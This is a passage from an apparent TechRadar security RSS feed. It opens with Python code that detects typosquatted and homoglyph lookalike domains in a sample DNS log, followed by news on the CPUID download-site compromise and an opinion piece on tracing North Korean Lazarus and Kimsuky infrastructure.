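HOMOGLYPHS = str.maketrans({"0": "o", "1": "l", "3": "e", "5": "s", "7": "t", "@": "a", "$": "s"})
CONFUSABLE_PAIRS = (("rn", "m"), ("vv", "w"), ("cl", "d"))


def normalise(label: str) -> str:
    """Fold homoglyphs and separators so 'rny-b@nk' compares as 'mybank'."""
    s = label.lower().translate(HOMOGLYPHS)
    for src, dst in CONFUSABLE_PAIRS:
        s = s.replace(src, dst)
    return re.sub(r"[^a-z0-9]", "", s)


def levenshtein(a: str, b: str) -> int:
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def registrable(domain: str) -> str:
    """Last two labels; a real deployment would consult the public suffix list."""
    return ".".join(domain.lower().rstrip(".").split(".")[-2:])


def match_brand(domain: str, max_distance: int = 1):
    """(brand, reason) if `domain` imitates a protected brand, else None."""
    reg = registrable(domain)
    if reg in PROTECTED:
        return None  # the genuine domain or one of its own subdomains
    reg_label = normalise(reg.split(".")[0])
    all_labels = normalise(".".join(domain.lower().split(".")[:-1]))
    for brand in sorted(PROTECTED):
        nb = normalise(brand.split(".")[0])
        if nb == reg_label:
            return brand, "homoglyph_or_tld_swap"
        if len(nb) >= 5 and levenshtein(nb, reg_label) <= max_distance:
            return brand, "typosquat"
        if len(nb) >= 5 and nb in all_labels:
            return brand, "brand_embedded"   # mybank.example.login-secure.example
    return None


def scan_dns_log(lines: list) -> list:
    """lines: constructed 'ts client qtype qname' resolver log. Returns
    (ts, client, qname, brand, reason) for every lookalike query."""
    hits = []
    for line in lines:
        ts, client, _qtype, qname = line.split()
        found = match_brand(qname)
        if found:
            hits.append((ts, client, qname, found[0], found[1]))
    return hits


# Constructed resolver log: the genuine site, three imitations of it, a benign
# name and a brand buried in a subdomain of an unrelated registrable domain.
SAMPLE_DNS = [
    "2026-04-01T10:00:00Z 10.0.0.12 A mybank.example",
    "2026-04-01T10:00:03Z 10.0.0.12 A rnybank.example",
    "2026-04-01T10:01:10Z 10.0.0.40 A mybank.example.login-secure.example",
    "2026-04-01T10:02:44Z 10.0.0.7 A weather.example",
    "2026-04-01T10:03:01Z 10.0.0.7 A mybanc.example",
    "2026-04-01T10:04:15Z 10.0.0.9 A taxoffice.example.net",
]
```

<p>The client address in each hit is the useful part: a user resolving a lookalike right after the genuine name, as 10.0.0.12 does above, has most likely just been handed a phishing link, and that is the moment to reach them rather than after the fake app has its KYC answers.</p>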
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ 'This is not your typical run-of-the-mill malware': CPUID download page hacked and tools replaced with links to malicious files ]]></title>
                                                                                                                                                                                                <link>https://www.techradar.com/pro/security/this-is-not-your-typical-run-of-the-mill-malware-cpuid-download-page-hacked-and-tools-replaced-with-links-to-malicious-files</link>
                                                                            <description>
                            <![CDATA[ Links to multiple CPUID tools hijacked and used to drop an infostealer. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">34pius347BfZbnLU9Txxwh</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/sqGgDPxHyGtqunPo56h9cL-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Mon, 13 Apr 2026 11:50:00 +0000</pubDate>                                                                                                                                                                                                                                <category><![CDATA[Security]]></category>
                                                    <category><![CDATA[Pro]]></category>
                                                                                                                    <dc:creator><![CDATA[ Sead Fadilpašić ]]></dc:creator>                                                                                                                                                                                                                                                                    <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/sqGgDPxHyGtqunPo56h9cL-1280-80.jpg">
                                                            <media:credit><![CDATA[Getty Images]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[A pink triangle with a red exclamation mark inside on a blue digital landscape]]></media:description>                                                            <media:text><![CDATA[A pink triangle with a red exclamation mark inside on a blue digital landscape]]></media:text>
                                <media:title type="plain"><![CDATA[A pink triangle with a red exclamation mark inside on a blue digital landscape]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/sqGgDPxHyGtqunPo56h9cL-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
<ul><li><strong>CPUID.com briefly compromised to serve malware</strong></li><li><strong>Tainted downloads used DLL sideloading with CRYPTBASE.dll</strong></li><li><strong>Sophisticated Trojan deployed, flagged by 20 AV engines</strong></li></ul><p>CPUID.com, a popular website for PC diagnostics tools, has confirmed it was compromised and used to serve <a href="https://www.techradar.com/best/best-malware-removal" target="_blank">malware</a>.</p><p>“Investigations are still ongoing, but it appears that a secondary feature (basically a side API) was compromised for approximately six hours between April 9 and April 10, causing the main website to randomly display malicious links (our signed original files were not compromised). The breach was found and has since been fixed,” the project’s maintainers told <a href="https://www.bleepingcomputer.com/news/security/supply-chain-attack-at-cpuid-pushes-malware-with-cpu-z-hwmonitor/" target="_blank"><em>BleepingComputer</em></a>. </p><p>In other words, the software hosted on CPUID was not poisoned - the site was merely serving different download links. Still, victims might think they’re downloading legitimate software.</p><h2 id="not-your-typical-malware">Not your typical malware</h2><p>Researchers from Kaspersky found that the download links for the following software were tainted:</p><p>CPU-Z (version 2.19)<br>HWMonitor Pro (version 1.57)<br>HWMonitor (version 1.63)<br>PerfMonitor (version 2.04)</p><p>The modified variants included a legitimate, signed executable and a malicious DLL named 'CRYPTBASE.dll', used for DLL sideloading.</p><p>"The malicious DLL is responsible for C2 [command and control] connection and further payload execution. 
Prior to this, it also performs a set of anti-sandbox checks and, if all the checks have passed, it connects to the C2 server," Kaspersky said.</p><p>At the same time, researchers from Igor’s Labs and vxunderground said the malware was rather sophisticated.</p><p>“As I began poking this with a stick, I discovered this is not your typical run-of-the-mill malware,” stated vxunderground.</p><p>“This malware is deeply trojanized, distributes from a compromised domain (cpuid-dot-com), performs file masquerading, is multi-staged, operates (almost) entirely in-memory, and uses some interesting methods to evade EDRs and/or AVs such as proxying NTDLL functionality from a .NET assembly.”</p><p>The website has since been cleaned up. VirusTotal shows that currently 20 antivirus engines are flagging the malware - some call it “Tedy Trojan”, others “Artemis Trojan”. It seems to be an infostealer.</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Lazarus and Kimsuky prove why infrastructure-level analysis is crucial for cybersecurity ]]></title>
                                                                                                                                                                                                <link>https://www.techradar.com/pro/lazarus-and-kimsuky-prove-why-infrastructure-level-analysis-is-crucial-for-cybersecurity</link>
                                                                            <description>
                            <![CDATA[ Infrastructure hunting is no longer a supporting discipline. It is the vantage point. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">BoQSnkF5zPgPDz4Pq4qZWk</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/7DtE9RCVmUtmH2FAfvxsvM-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Fri, 10 Apr 2026 10:50:22 +0000</pubDate>                                                                                                                                <updated>Wed, 22 Apr 2026 16:06:29 +0000</updated>
                                                                                                                                            <category><![CDATA[Pro]]></category>
                                                                                                                    <dc:creator><![CDATA[ Gerald Beuchelt ]]></dc:creator>                                                                <dc:description><![CDATA[ https://cdn.mos.cms.futurecdn.net/hTZgchTRwyMqVtHXRvKeH7.jpg ]]></dc:description>
                                                                                                                                                                                                                                                <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/7DtE9RCVmUtmH2FAfvxsvM-1280-80.jpg">
                                                            <media:credit><![CDATA[Shutterstock]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[Malware attack virus alert , malicious software infection , cyber security awareness training to protect business]]></media:description>                                                            <media:text><![CDATA[Malware attack virus alert , malicious software infection , cyber security awareness training to protect business]]></media:text>
                                <media:title type="plain"><![CDATA[Malware attack virus alert , malicious software infection , cyber security awareness training to protect business]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/7DtE9RCVmUtmH2FAfvxsvM-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <p>North Korea runs one of the world’s most aggressive cyber operations. From billion-dollar cryptocurrency theft to high-profile supply chain compromises, its state-backed operators hammer security teams with a potent blend of espionage, financial crime and destructive campaigns.</p><p>The likes of Lazarus and Kimsuky sit at the center of the DPRK ecosystem. And they show no mercy — targeting anyone from startups to government organizations and critical <a href="https://www.techradar.com/best/best-infrastructure-management-service">IT infrastructure</a> — in pursuit of revenue, intelligence, and strategic leverage.</p><p>The constant pressure these groups apply has shaped how organizations defend themselves. To date, the playbook has been largely reactive and malware-centric. </p><p>Blue teams focus efforts on dissecting payloads, reverse engineering samples and racing to detect the next variant. But new research into DPRK activity suggests defenders may be tracking the wrong signal.</p><p>In fact, one of the most reliable ways to track these actors is through the infrastructure they leave behind.</p><h2 id="the-blind-spot-in-modern-defense">The blind spot in modern defense</h2><p>Many organizations are investing heavily in <a href="https://www.techradar.com/news/best-endpoint-security-software">endpoint protection</a> and malware detection, which is essential for fending off imminent threats. However, far less attention is paid to infrastructure-level telemetry. </p><p>It’s this deeper analysis, which can highlight consistent operational behaviours, that many security teams are missing out on. </p><p>A joint investigation by the Acronis Threat Research Unit and Hunt.io set out to map ongoing DPRK infrastructure. 
It uncovered persistent infrastructure reuse linking campaigns over time: shared certificates spanning twelve <a href="https://www.techradar.com/best/best-ip-address-tools">IP addresses</a>, identical Fast Reverse Proxy (FRP) tunnelling nodes deployed across multiple hosts, and exposed staging servers hosting gigabytes of operational tooling. </p><h2 id="why-does-this-matter">Why does this matter? </h2><p>Payloads are engineered to mutate and evade signature-based detection. Infrastructure, by contrast, reflects habits — repeatable configurations, templated deployments and reused communication channels that persist across campaigns. </p><p>Even mature <a href="https://www.techradar.com/news/best-internet-security-suites">internet security</a> programs often center response strategies around payload analysis and alert triage, which can leave preparation activity invisible until an intrusion is underway. This may explain why DPRK operators continue to reuse infrastructure for years, even after major supply chain incidents.</p><h2 id="open-directories-expose-operational-staging">Open directories expose operational staging</h2><p>Take exposed HTTP directories, for example. While investigating, researchers repeatedly found <a href="https://www.techradar.com/news/best-dedicated-server-hosting-providers">servers</a> hosting structured toolkits that included credential harvesting utilities, remote access tools, exfiltration binaries and tunnelling components.</p><p>In one case, the exposed environment contained thousands of files and nearly two gigabytes of operational tooling. It resembled a live operator workspace rather than a simple <a href="https://www.techradar.com/best/best-malware-removal">malware</a> drop location. In practical terms, it felt less like discovering a single malicious file and more like stumbling into an active DPRK toolkit mid-operation.</p><p>This discovery shows how DPRK operators optimize for speed. 
Open directories reduce friction and allow attackers to retrieve tools quickly during an intrusion without maintaining complex delivery infrastructure. </p><p>It also shows operational maturity. If attackers are comfortable staging tooling at this scale, it points to a focus on efficiency and repeatability — and that they do not expect defenders to be monitoring these environments consistently.</p><h2 id="tunnelling-infrastructure-shows-how-campaigns-scale">Tunnelling infrastructure shows how campaigns scale</h2><p>Tunnelling infrastructure provides one of the clearest examples of infrastructure reuse in practice.</p><p>In the joint investigation, researchers identified eight identical Fast Reverse Proxy (FRP) nodes running on the same port across different hosts. FRP is commonly used to create reverse tunnels that allow operators to maintain access to compromised systems, even when inbound connections are restricted. Finding the same configuration replicated across multiple servers points to templated deployment rather than ad-hoc setup.</p><p>The good news is that when tunnelling nodes are provisioned in the same way across campaigns, they create predictable artefacts that defenders can track. Even if <a href="https://www.techradar.com/news/best-domain-registrars">domains</a> rotate and malware families evolve, the underlying access layer may remain consistent. </p><p>In the case of DPRK infrastructure, repeatability points to operational efficiency — but it also offers defenders a more durable hunting signal than any single malicious binary.</p><h2 id="infrastructure-is-the-connective-tissue">Infrastructure is the connective tissue</h2><p>Across four separate hunts, the same patterns kept resurfacing. Exposed staging directories packed with credential theft tooling. Fast Reverse Proxy tunnels configured identically across different <a href="https://www.techradar.com/news/best-vps-hosting">VPS</a> hosts. 
Reused certificates linking twelve IP addresses back to the same operational clusters.</p><p>These were not isolated discoveries. They were recurring elements of a structured ecosystem.</p><p>And that’s why it’s so important to look deeper. Once the pivot moves from payloads to infrastructure, the separation between DPRK subgroups becomes less distinct and shared operational habits start to surface. Campaigns that appear unrelated at the malware level begin to reveal common certificates, showing how activity often treated as separate is in fact closely linked.</p><p>Operational security among DPRK cyber operators has evolved unevenly over the past decade, revealing a trade-off between stealth and operational efficiency. Early Lazarus campaigns in the mid-2010s were marked by comparatively noisy infrastructure and bespoke malware, making attribution possible but often slow and reliant on payload analysis and victim-side forensics.</p><p>As global scrutiny increased following high-profile incidents, DPRK actors adapted by hardening malware, adopting layered obfuscation and increasingly abusing legitimate platforms and <a href="https://www.techradar.com/best/best-open-source-software">open source</a> tooling to blend into normal traffic. At the same time, repeated investigations point to a persistent weakness in infrastructure OPSEC: long-lived staging servers, reused certificates, identical Fast Reverse Proxy tunnelling nodes and exposed directories that reappear across campaigns and even across subgroups such as Lazarus and Kimsuky.</p><p>Incidents like the Kimsuky “Kim” leak highlight this imbalance, where sophisticated social engineering and credential theft operations were undermined by recoverable operator artefacts and poorly compartmentalized infrastructure. 
</p><p>Taken together, the record of the past decade suggests DPRK actors have become more disciplined at the payload and intrusion layer, but remain consistently exposed at the infrastructure layer, giving defenders a durable, campaign-spanning advantage.</p><p>Malware will continue to evolve. Lures will change. Domains will rotate. Infrastructure, however, leaves consistent patterns. In the case of Lazarus and Kimsuky, and beyond, these patterns make it possible to connect activity, surface related clusters and identify supporting infrastructure before it is fully weaponized.</p><p>That is why infrastructure hunting is no longer a supporting discipline. It is the vantage point that allows defenders to see how operations are built, sustained and scaled.</p><p><a href="https://www.techradar.com/best/best-antivirus"><em>We reviewed and rated the best Antivirus Software</em></a>.</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
            </channel>
</rss>